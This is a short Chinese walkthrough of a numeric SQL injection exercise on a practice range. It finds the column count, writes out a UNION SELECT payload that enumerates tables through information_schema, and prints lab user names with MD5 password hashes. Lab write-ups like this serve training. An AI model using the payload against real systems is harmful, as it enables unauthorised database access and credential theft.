渊龙靶场-sql注入(数字型注入)
1.开局请求抓包
测试点如上图,测试注入,存在注入。
2.查询列数
我们再查他多少列 ,最后测试为为2列。
3.查询回显位
发现均可以回显
4.查询表
插入语句查询表和数据库
union select database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --+
得到数据库和表
库:s2747857 表:httpinfo,member,message,users,xssblind
5.查询列:
然后就找列:
user表:id,username,password,level
httpinfo表:id,userid,ipaddress,useragent,httpaccept,remoteport
member表:id,username,pw,sex,phonenum,address,email
message表:id,content,time
xssblind表:id,time,content,name
6.查询值
因为库,表,字段均已知了,所以直接查询就好了
这里查询user表字段吧。 id,username,password,level
1admine10adc3949ba59abbe56e057f20f883e1,2pikachu670b14728ad9902aecba32e22fa4f6bd2,3teste99a18c428cb38d5f260853678922e033
到此就结束了。